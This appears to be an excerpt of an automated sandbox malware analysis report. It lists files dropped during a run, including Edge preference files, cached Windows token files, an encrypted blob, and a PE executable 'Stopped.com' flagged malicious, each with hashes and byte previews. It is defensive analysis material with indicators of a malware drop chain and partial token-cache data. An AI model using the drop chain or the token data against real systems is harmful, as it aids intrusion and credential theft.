                                                                                                                                                                                                                                                                                          SHA-512:58668D0C28B63548A1F13D2C2DFA19BCC14C0B7406833AD8E72DFC07F46D8DF6DED46265D74A042D07FBC88F78A59CB32389EF384EC78A55976DFC2737868771
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:{"user_experience_metrics.stability.exited_cleanly":false,"variations_crash_streak":2}

                                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Edge\User Data\a2478277-9c54-4a77-b722-d35247154afe.tmp

                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                          File Type:JSON data
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):44137
                                                                                                                                                                                                                                                                                          Entropy (8bit):6.090739758425852
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:768:zDXzgWPsj/qlGJqIY8GB4kkBMnwuF9hDO6vP6O+Ftbzy70FqHoPFkGoup1Xl3jVu:z/Ps+wsI7ynE/6Qtbz8hu3VlXr4CRo1
                                                                                                                                                                                                                                                                                          MD5:53E6174A7A8AD736B51551C38034DA87
                                                                                                                                                                                                                                                                                          SHA1:ACE50599E966385A160D82A2DF639A1AA4269F95
                                                                                                                                                                                                                                                                                          SHA-256:DBAA78CAD6D2D1F64E8F8E17271FEBE4FA8E8211DB2D3E37844340FF4D5883E0
                                                                                                                                                                                                                                                                                          SHA-512:FDE2C14EAB00940FCA1BE718613F6D7F0F83C2060B3370E277F93C014FE72EB792B3E387C22252313FBDB9F078EEC36BD9562E9E9AB81B03F98B422CC14FF4B5
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:{"abusive_adblocker_etag":"\"229EC35087C81534A88F41A12F3A505F330A0BE57C43F6CEB29F4718042EFC4F\"","desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"domain_actions_config":"H4sIAAAAAAAAAL19a4/cNpboXzH60+4gRbvbrzj7aTbj2Ql2MhlkswhwF4MGRVISWxQp81FVqkH++z2HUrXbLkndh51dBHba1XX4PDzvxz+v+P76VjipxG2teExe3YpWie7W7ZX3Wqqr7/55xYfBaMGjdjZcffc/8wdK3g4OPh+vvrv6aYg/pXj1zZV0PdcWPrEq1kYfmXD91W/fUEBCTFK7MEH+45urDKHVNLPlvXoIHMcB//3H/fX3uIk/T3v4HrcwfweHgL0EWPzVd9e/fXMlZE/dnTXjx+Pggvq74ePPisvx4bqD0bbZ2Og99K8w415b9RA4usTivgSy50f4WTHYRQE0r0TxkvcMIVQpvOHvmY4lkMdaWx3H0okPPIoWVi/cFl5uDqEbWICCMbxrAKlKh6lMUiL5PY4UWn5ggpcM0yp8Ynv4jYve2dLVCA978oD/ouXWKlM6jo08toiSpffjDoNXQdkYBpOKD3ffHgufVJtMKp0Vvs4+JS06uJShdJA/6dD+0Y6HVnm1TQAXSdJMDfEjnz/CJVxAPJh4Brj/5JJYZtZAI5d/gW/+WP9F7UWmyTTSsQFstY3KSrd5MJfw8x4ffriwzR5P5lZboOXq2cwPcaHxvO+5N1vU6gKw18K74OqIVMGrwcGWi+B3/fhgiJ2sSYzY4W5ZcE8FcFZJr/eKGfyLMJOray0KIOCL4cFk21LCwm0jIsXbWhuge7fO3sKot+GggT0

                                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Edge\User Data\bd51aaf7-8471-4359-b494-d393fff96901.tmp

                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                          File Type:JSON data
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):44604
                                                                                                                                                                                                                                                                                          Entropy (8bit):6.095645159561631
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:768:zDXzgWPsj/qlGJqIY8GB4kkBMwu0hDO6vP6OdPUDXZ+sjFcGoup1Xl3jVzXr4CCz:z/Ps+wsI7ynEU6aVchu3VlXr4CRo1
                                                                                                                                                                                                                                                                                          MD5:9ADE921AAE7B611367DCF13031BDFB5A
                                                                                                                                                                                                                                                                                          SHA1:154A51194BC49470C60415578AEA648021C410B8
                                                                                                                                                                                                                                                                                          SHA-256:A16E0EEF46E78F798D644802BAEE73E35DA137A658727BF6ECC2F2D2CFE7B36F
                                                                                                                                                                                                                                                                                          SHA-512:180183AE2B9A31106C6EA5C6A76427850281C739847415817AE2AF48E85D0E0126A21C625B126C91C506813DAEE338335A514C00A9CA7B783F7F39C210ABCF78
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:{"abusive_adblocker_etag":"\"229EC35087C81534A88F41A12F3A505F330A0BE57C43F6CEB29F4718042EFC4F\"","desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"domain_actions_config":"H4sIAAAAAAAAAL19a4/cNpboXzH60+4gRbvbrzj7aTbj2Ql2MhlkswhwF4MGRVISWxQp81FVqkH++z2HUrXbLkndh51dBHba1XX4PDzvxz+v+P76VjipxG2teExe3YpWie7W7ZX3Wqqr7/55xYfBaMGjdjZcffc/8wdK3g4OPh+vvrv6aYg/pXj1zZV0PdcWPrEq1kYfmXD91W/fUEBCTFK7MEH+45urDKHVNLPlvXoIHMcB//3H/fX3uIk/T3v4HrcwfweHgL0EWPzVd9e/fXMlZE/dnTXjx+Pggvq74ePPisvx4bqD0bbZ2Og99K8w415b9RA4usTivgSy50f4WTHYRQE0r0TxkvcMIVQpvOHvmY4lkMdaWx3H0okPPIoWVi/cFl5uDqEbWICCMbxrAKlKh6lMUiL5PY4UWn5ggpcM0yp8Ynv4jYve2dLVCA978oD/ouXWKlM6jo08toiSpffjDoNXQdkYBpOKD3ffHgufVJtMKp0Vvs4+JS06uJShdJA/6dD+0Y6HVnm1TQAXSdJMDfEjnz/CJVxAPJh4Brj/5JJYZtZAI5d/gW/+WP9F7UWmyTTSsQFstY3KSrd5MJfw8x4ffriwzR5P5lZboOXq2cwPcaHxvO+5N1vU6gKw18K74OqIVMGrwcGWi+B3/fhgiJ2sSYzY4W5ZcE8FcFZJr/eKGfyLMJOray0KIOCL4cFk21LCwm0jIsXbWhuge7fO3sKot+GggT0

                                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Edge\User Data\ea82d617-f00e-4a14-b21b-ac3b51a31c28.tmp

                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                          File Type:JSON data
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):44596
                                                                                                                                                                                                                                                                                          Entropy (8bit):6.095910873649663
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:768:zDXzgWPsj/qlGJqIY8GB4kkBMwu0hDO6vP6OdPUv93fqUF9cGoup1Xl3jVzXr4CW:z/Ps+wsI7ynEU6aZchu3VlXr4CRo1
                                                                                                                                                                                                                                                                                          MD5:17EE390C2DC808E7371E31EA8CF364EB
                                                                                                                                                                                                                                                                                          SHA1:5F734CBF4D7C71C1630C527421FF3E4C964FF861
                                                                                                                                                                                                                                                                                          SHA-256:036C3EEB680043D907F67824D38FFC0E53B51BC4C6447125A4BAF2B92D6B8AF9
                                                                                                                                                                                                                                                                                          SHA-512:F5FE438885968ACFE8E881D30DA36F242F91812F5B7057B15DFBDEBF7651A07AA0D2E41CFE38053EE8BF5AA04B4DFF7670252E735F7176486131CFA10BD8A823
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:{"abusive_adblocker_etag":"\"229EC35087C81534A88F41A12F3A505F330A0BE57C43F6CEB29F4718042EFC4F\"","desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"domain_actions_config":"H4sIAAAAAAAAAL19a4/cNpboXzH60+4gRbvbrzj7aTbj2Ql2MhlkswhwF4MGRVISWxQp81FVqkH++z2HUrXbLkndh51dBHba1XX4PDzvxz+v+P76VjipxG2teExe3YpWie7W7ZX3Wqqr7/55xYfBaMGjdjZcffc/8wdK3g4OPh+vvrv6aYg/pXj1zZV0PdcWPrEq1kYfmXD91W/fUEBCTFK7MEH+45urDKHVNLPlvXoIHMcB//3H/fX3uIk/T3v4HrcwfweHgL0EWPzVd9e/fXMlZE/dnTXjx+Pggvq74ePPisvx4bqD0bbZ2Og99K8w415b9RA4usTivgSy50f4WTHYRQE0r0TxkvcMIVQpvOHvmY4lkMdaWx3H0okPPIoWVi/cFl5uDqEbWICCMbxrAKlKh6lMUiL5PY4UWn5ggpcM0yp8Ynv4jYve2dLVCA978oD/ouXWKlM6jo08toiSpffjDoNXQdkYBpOKD3ffHgufVJtMKp0Vvs4+JS06uJShdJA/6dD+0Y6HVnm1TQAXSdJMDfEjnz/CJVxAPJh4Brj/5JJYZtZAI5d/gW/+WP9F7UWmyTTSsQFstY3KSrd5MJfw8x4ffriwzR5P5lZboOXq2cwPcaHxvO+5N1vU6gKw18K74OqIVMGrwcGWi+B3/fhgiJ2sSYzY4W5ZcE8FcFZJr/eKGfyLMJOray0KIOCL4cFk21LCwm0jIsXbWhuge7fO3sKot+GggT0

                                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Edge\User Data\f329434d-e11c-4dae-88d6-dc8ebf76ab27.tmp

                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                          File Type:JSON data
                                                                                                                                                                                                                                                                                          Category:modified
                                                                                                                                                                                                                                                                                          Size (bytes):44596
                                                                                                                                                                                                                                                                                          Entropy (8bit):6.095910873649663
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:768:zDXzgWPsj/qlGJqIY8GB4kkBMwu0hDO6vP6OdPUv93fqUF9cGoup1Xl3jVzXr4CW:z/Ps+wsI7ynEU6aZchu3VlXr4CRo1
                                                                                                                                                                                                                                                                                          MD5:17EE390C2DC808E7371E31EA8CF364EB
                                                                                                                                                                                                                                                                                          SHA1:5F734CBF4D7C71C1630C527421FF3E4C964FF861
                                                                                                                                                                                                                                                                                          SHA-256:036C3EEB680043D907F67824D38FFC0E53B51BC4C6447125A4BAF2B92D6B8AF9
                                                                                                                                                                                                                                                                                          SHA-512:F5FE438885968ACFE8E881D30DA36F242F91812F5B7057B15DFBDEBF7651A07AA0D2E41CFE38053EE8BF5AA04B4DFF7670252E735F7176486131CFA10BD8A823
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:{"abusive_adblocker_etag":"\"229EC35087C81534A88F41A12F3A505F330A0BE57C43F6CEB29F4718042EFC4F\"","desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"domain_actions_config":"H4sIAAAAAAAAAL19a4/cNpboXzH60+4gRbvbrzj7aTbj2Ql2MhlkswhwF4MGRVISWxQp81FVqkH++z2HUrXbLkndh51dBHba1XX4PDzvxz+v+P76VjipxG2teExe3YpWie7W7ZX3Wqqr7/55xYfBaMGjdjZcffc/8wdK3g4OPh+vvrv6aYg/pXj1zZV0PdcWPrEq1kYfmXD91W/fUEBCTFK7MEH+45urDKHVNLPlvXoIHMcB//3H/fX3uIk/T3v4HrcwfweHgL0EWPzVd9e/fXMlZE/dnTXjx+Pggvq74ePPisvx4bqD0bbZ2Og99K8w415b9RA4usTivgSy50f4WTHYRQE0r0TxkvcMIVQpvOHvmY4lkMdaWx3H0okPPIoWVi/cFl5uDqEbWICCMbxrAKlKh6lMUiL5PY4UWn5ggpcM0yp8Ynv4jYve2dLVCA978oD/ouXWKlM6jo08toiSpffjDoNXQdkYBpOKD3ffHgufVJtMKp0Vvs4+JS06uJShdJA/6dD+0Y6HVnm1TQAXSdJMDfEjnz/CJVxAPJh4Brj/5JJYZtZAI5d/gW/+WP9F7UWmyTTSsQFstY3KSrd5MJfw8x4ffriwzR5P5lZboOXq2cwPcaHxvO+5N1vU6gKw18K74OqIVMGrwcGWi+B3/fhgiJ2sSYzY4W5ZcE8FcFZJr/eKGfyLMJOray0KIOCL4cFk21LCwm0jIsXbWhuge7fO3sKot+GggT0

                                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\TokenBroker\Cache\5a2a7058cf8d1e56c20e6b19a7c48eb2386d141b.tbres

                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                          File Type:data
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):2278
                                                                                                                                                                                                                                                                                          Entropy (8bit):3.8410537495113504
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:48:uiTrlKxrgxyxl9Il8uMxL5T0WxU0OlU9t1aOWd1rc:m7YmxL5TTy0Oy9t1aON
                                                                                                                                                                                                                                                                                          MD5:ECC790D85A779339DC5F1A8AEE508C34
                                                                                                                                                                                                                                                                                          SHA1:D2C33D31D2A6E70EB605631DAC57C383BD852A41
                                                                                                                                                                                                                                                                                          SHA-256:6780EA687F4C7C64557DD2AB25D384D3A614E4ED71FC9E787E43C07684EA5E5E
                                                                                                                                                                                                                                                                                          SHA-512:3E16D956EF4516D8DE83F9EA3E60F39D1F396F3BF3616C6A498B1DB8BA64EB95BFB2141E8AD661BA715BB58CBDA45721C52E07D28B6B56D59F1CE23B54DEF9D0
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:{.".T.B.D.a.t.a.S.t.o.r.e.O.b.j.e.c.t.".:.{.".H.e.a.d.e.r.".:.{.".O.b.j.e.c.t.T.y.p.e.".:.".T.o.k.e.n.R.e.s.p.o.n.s.e.".,.".S.c.h.e.m.a.V.e.r.s.i.o.n.M.a.j.o.r.".:.2.,.".S.c.h.e.m.a.V.e.r.s.i.o.n.M.i.n.o.r.".:.1.}.,.".O.b.j.e.c.t.D.a.t.a.".:.{.".S.y.s.t.e.m.D.e.f.i.n.e.d.P.r.o.p.e.r.t.i.e.s.".:.{.".R.e.q.u.e.s.t.I.n.d.e.x.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.f.a.l.s.e.,.".V.a.l.u.e.".:.".W.i.p.w.W.M.+.N.H.l.b.C.D.m.s.Z.p.8.S.O.s.j.h.t.F.B.s.=.".}.,.".E.x.p.i.r.a.t.i.o.n.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.f.a.l.s.e.,.".V.a.l.u.e.".:.".g.H.o.c.V.q.V.b.2.w.E.=.".}.,.".S.t.a.t.u.s.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.f.a.l.s.e.,.".V.a.l.u.e.".:.".A.A.A.A.A.A.=.=.".}.,.".R.e.s.p.o.n.s.e.B.y.t.e.s.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.t.r.u.e.,.".V.a.l.u.e.".:.".A.Q.A.A.A.N.C.M.n.d.8.B.F.d.E.R.j.H.o.A.w.E./.C.l.+.s.B.A.A.A.A.L./.c.P.a.F.

                                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\TokenBroker\Cache\cf7513a936f7effbb38627e56f8d1fce10eb12cc.tbres

                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                          File Type:data
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):4622
                                                                                                                                                                                                                                                                                          Entropy (8bit):3.9994779751977956
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:96:HKYmN0yWvav3W7y3mwxJJ9XWmQrf5V/yywY6iSsSOEaQ13:HKlqyWvavW7SrxtGmQrfOYhE/aQ13
                                                                                                                                                                                                                                                                                          MD5:794C3BAF48918A2D65F36519853A2A16
                                                                                                                                                                                                                                                                                          SHA1:5CDC9ED4820FA231BC23DA681E86D0C1BED0D034
                                                                                                                                                                                                                                                                                          SHA-256:634AA9CAEABEC79C3644F64646BB0C1CAF857493F988AE8E79321216DADE96E1
                                                                                                                                                                                                                                                                                          SHA-512:DA6E4B3657270CFCAD73F146F226B910C594F46D9CF095F7FB65D8B57784C344BDF21EAE5C425FB33BB5682DCD3571CCEFF3D44B3DBD9B0BF7C2A21054DF2469
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:{.".T.B.D.a.t.a.S.t.o.r.e.O.b.j.e.c.t.".:.{.".H.e.a.d.e.r.".:.{.".O.b.j.e.c.t.T.y.p.e.".:.".T.o.k.e.n.R.e.s.p.o.n.s.e.".,.".S.c.h.e.m.a.V.e.r.s.i.o.n.M.a.j.o.r.".:.2.,.".S.c.h.e.m.a.V.e.r.s.i.o.n.M.i.n.o.r.".:.1.}.,.".O.b.j.e.c.t.D.a.t.a.".:.{.".S.y.s.t.e.m.D.e.f.i.n.e.d.P.r.o.p.e.r.t.i.e.s.".:.{.".R.e.q.u.e.s.t.I.n.d.e.x.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.f.a.l.s.e.,.".V.a.l.u.e.".:.".z.3.U.T.q.T.b.3.7./.u.z.h.i.f.l.b.4.0.f.z.h.D.r.E.s.w.=.".}.,.".E.x.p.i.r.a.t.i.o.n.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.f.a.l.s.e.,.".V.a.l.u.e.".:.".t.r.O.F.O.5.1.b.2.w.E.=.".}.,.".S.t.a.t.u.s.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.f.a.l.s.e.,.".V.a.l.u.e.".:.".A.w.A.A.A.A.=.=.".}.,.".R.e.s.p.o.n.s.e.B.y.t.e.s.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.t.r.u.e.,.".V.a.l.u.e.".:.".A.Q.A.A.A.N.C.M.n.d.8.B.F.d.E.R.j.H.o.A.w.E./.C.l.+.s.B.A.A.A.A.L./.c.P.a.F.

                                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\TokenBroker\Cache\e8ddd4cbd9c0504aace6ef7a13fa20d04fd52408.tbres

                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                          File Type:data
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):2684
                                                                                                                                                                                                                                                                                          Entropy (8bit):3.9100875457342115
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:48:uiTrlKx68Wa7xNxl9Il8uM+u0UIqYvL/OVDMbIqfVG8JN9zIxgZ0od/vc:aTYm50UIRvLWgdGwDIWZA
                                                                                                                                                                                                                                                                                          MD5:F89D3E6E4E67E14D112B036B4C0DD18A
                                                                                                                                                                                                                                                                                          SHA1:1D7510F5FC542A17547D3850ACC05AE8EB996B0A
                                                                                                                                                                                                                                                                                          SHA-256:438E12F5FECA5E2AEDA93BDA1049C3C7E1D31FE3454E8674D13E3BE2427C096C
                                                                                                                                                                                                                                                                                          SHA-512:592DC6551229C44EE2C2C0285B4D7BB9F47532978EAD023636A89D226C89ABDC742DA635603A4FB47BD664E2B039657B2FA0AC8EAC22F204C3F5BAF102F8E7A4
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:{.".T.B.D.a.t.a.S.t.o.r.e.O.b.j.e.c.t.".:.{.".H.e.a.d.e.r.".:.{.".O.b.j.e.c.t.T.y.p.e.".:.".T.o.k.e.n.R.e.s.p.o.n.s.e.".,.".S.c.h.e.m.a.V.e.r.s.i.o.n.M.a.j.o.r.".:.2.,.".S.c.h.e.m.a.V.e.r.s.i.o.n.M.i.n.o.r.".:.1.}.,.".O.b.j.e.c.t.D.a.t.a.".:.{.".S.y.s.t.e.m.D.e.f.i.n.e.d.P.r.o.p.e.r.t.i.e.s.".:.{.".R.e.q.u.e.s.t.I.n.d.e.x.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.f.a.l.s.e.,.".V.a.l.u.e.".:.".6.N.3.U.y.9.n.A.U.E.q.s.5.u.9.6.E./.o.g.0.E./.V.J.A.g.=.".}.,.".E.x.p.i.r.a.t.i.o.n.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.f.a.l.s.e.,.".V.a.l.u.e.".:.".Z.n.q.k.a.2.5.6.3.A.E.=.".}.,.".S.t.a.t.u.s.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.f.a.l.s.e.,.".V.a.l.u.e.".:.".A.A.A.A.A.A.=.=.".}.,.".R.e.s.p.o.n.s.e.B.y.t.e.s.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.t.r.u.e.,.".V.a.l.u.e.".:.".A.Q.A.A.A.N.C.M.n.d.8.B.F.d.E.R.j.H.o.A.w.E./.C.l.+.s.B.A.A.A.A.L./.c.P.a.F.

                                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\164676\Stopped.com

                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                          Process:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                          Category:modified
                                                                                                                                                                                                                                                                                          Size (bytes):947288
                                                                                                                                                                                                                                                                                          Entropy (8bit):6.630612696399572
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:24576:uvG4FEq/TQ+Svbi3zcNjmsuENOJuM8WU2a+BYK:u9GqLQHbijkmc2umva+OK
                                                                                                                                                                                                                                                                                          MD5:62D09F076E6E0240548C2F837536A46A
                                                                                                                                                                                                                                                                                          SHA1:26BDBC63AF8ABAE9A8FB6EC0913A307EF6614CF2
                                                                                                                                                                                                                                                                                          SHA-256:1300262A9D6BB6FCBEFC0D299CCE194435790E70B9C7B4A651E202E90A32FD49
                                                                                                                                                                                                                                                                                          SHA-512:32DE0D8BB57F3D3EB01D16950B07176866C7FB2E737D9811F61F7BE6606A6A38A5FC5D4D2AE54A190636409B2A7943ABCA292D6CEFAA89DF1FC474A1312C695F
                                                                                                                                                                                                                                                                                          Malicious:true
                                                                                                                                                                                                                                                                                          Antivirus:
                                                                                                                                                                                                                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                                                          Joe Sandbox View:
                                                                                                                                                                                                                                                                                          • Filename: MatAugust.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                                                                          • Filename: 6684V5n83w.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                                                                          • Filename: vlid_acid.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                                                                          • Filename: AquaPac.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                                                                          • Filename: 0442.pdf.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                                                                          • Filename: installer_1.05_36.5.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                                                                          • Filename: @Setup.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                                                                          • Filename: !Set-up..exe, Detection: malicious, Browse
                                                                                                                                                                                                                                                                                          • Filename: !Setup.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                                                                          • Filename: SgMuuLxOCJ.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........;..h..h..hX;1h..hX;3hq..hX;2h..hr..h..h...i...h...i...h...i...h..Ch..h..Sh..h..h..hI..i...hI..i..hI.?h..h.Wh..hI..i..hRich..h........PE..L......b.........."...............................@..................................k....@...@.......@.........................|....P..h............N..X&...0..tv...........................C..........@............................................text............................... ..`.rdata..............................@..@.data....p.......H..................@....rsrc...h....P......................@..@.reloc..tv...0...x..................@..B................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\164676\h

                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                          Process:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                          File Type:data
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):524150
                                                                                                                                                                                                                                                                                          Entropy (8bit):7.999648195093761
                                                                                                                                                                                                                                                                                          Encrypted:true
                                                                                                                                                                                                                                                                                          SSDEEP:12288:olQrDDU1sW+ow6HM3+E/s48yX9FipCq06zHJsMFrwA4u:yQrU1s5WsOEk48ytF+06zHtFrUu
                                                                                                                                                                                                                                                                                          MD5:52B78F78FF435289F3F1843C52ADA79B
                                                                                                                                                                                                                                                                                          SHA1:5B6A57B9788084319EE3045719196FF1568EC817
                                                                                                                                                                                                                                                                                          SHA-256:165BC09794A9C080E326459FACA48AAF86B4927637EA857583A80EE7EF2B223A
                                                                                                                                                                                                                                                                                          SHA-512:C94666E9A7FDB3F4D0061E1FD62FD926A78A1193850EA265B4C076CFE3A619E7EEAA6F7DE40E2698C87D8EEADF904DA6AE9DDA1380D5556F4E67E9B7DD9C2D8D
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:^.K...S..>..cC.l......=....i..A.K..q....0l.".h.(..P}...,...W....o..7...0b..c..~}Y..^......."..o........g.Li..$.Hk..;..Ig.M.s.h.`.O....g...@Z.E.=.3.c...@......x......Vv...7.z..*.,...".j.......13.^D.v...F...I.3K..Cs%u...+..Hw..hO.`.[ba.%E..|.....qO...ag.Z.......e...-i..I.h..Z.C...........s%...}....D...|8...........Lv....-.V......B.....i.R(.Y....<1>.6G.-%u...-.`.!..........*o.fCk...Q{.\.w...D.N!....$..Ps.....ix.,\....P9..!.6..........]+`p..TP<..!.<%..ZR...=f./...s.Oz.%.x.p..1dDI.1Qf....}"....kR.u.......FR.......Q.. ...........[\;LH..gi.............'.Y..CM[.OLY.qgO..\.)Ws..:.L....5..[..$.A...".Qj#....V...T...2..S.t...8...Z\.L.m.z>.66..<0...y.8...v~.Tv..9}_....8.BE..hph.i.*N.!.H..._... .......A.....s......?"\.Xz....X;...j.S.n..:+.}..I9..4h...6L).h..X....\I.h2.0...?/..Y'.....UE..-...r.T....6.x.tN.W.vD1.m...?.Am...Y.r.....g.Hz..\..Id...z..K^.....v|..............Z..`...O...r..C.&........@..e...{.<.....GTG..........(.w.........o....W..:..

                                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Born

                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                          Process:C:\Windows\SysWOW64\extrac32.exe
                                                                                                                                                                                                                                                                                          File Type:data
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):120832
                                                                                                                                                                                                                                                                                          Entropy (8bit):4.734403049940509
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:768:ux/SGKAGWRqA60dTcR4qYnGfAHE9AUsFxyLtVSQsbZgar3R/OWelz:udKaj6iTcPAsAhxjgarB/5elz
                                                                                                                                                                                                                                                                                          MD5:9E3D1257DE29104ACBC0FB84C9E4D1B4
                                                                                                                                                                                                                                                                                          SHA1:7F88FD85BF4A8C4A9538481190CDDA188B4E4E15
                                                                                                                                                                                                                                                                                          SHA-256:FD62C3D04E17AA63D9663F499CF52907ED1E1E62FF47F508EC5AC7F4123438E2
                                                                                                                                                                                                                                                                                          SHA-512:DFD248D0143FAAAC0B7AB371AE4F577BC59ACB87748354D359DCDF759EF9937AA682656F9D0AEF7E7BC8018FA526DB43BF07CB8AAF7D74B02D52EFC77FD2A5BA
                                                                                                                                                                                                                                                                                          Malicious:false
